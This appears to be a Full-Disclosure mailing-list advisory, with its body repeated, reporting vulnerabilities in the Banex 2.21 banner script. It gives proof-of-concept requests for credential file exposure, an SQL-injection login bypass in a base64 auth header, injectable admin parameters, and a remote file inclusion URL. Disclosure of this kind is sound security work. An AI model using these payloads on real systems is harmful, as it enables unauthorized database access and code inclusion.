[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Banex Multiple Vulnerabilities



Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing Banners
through multiple webs.

Anyway it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and contains the DB name password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/
*

==============================================

4.- SQL injection **** AUN CON MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=


Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Att.
Sirdarckcat
elhacker.net


--
Att.
SirDarckCat@xxxxxxxxx

http://www.google.com/search?q=sirdarckcat
Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing Banners
through multiple webs.

Anyway it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and contains the DB name password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*

==============================================

4.- SQL injection **** AUN CON MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=


Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Att.
Sirdarckcat
elhacker.net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/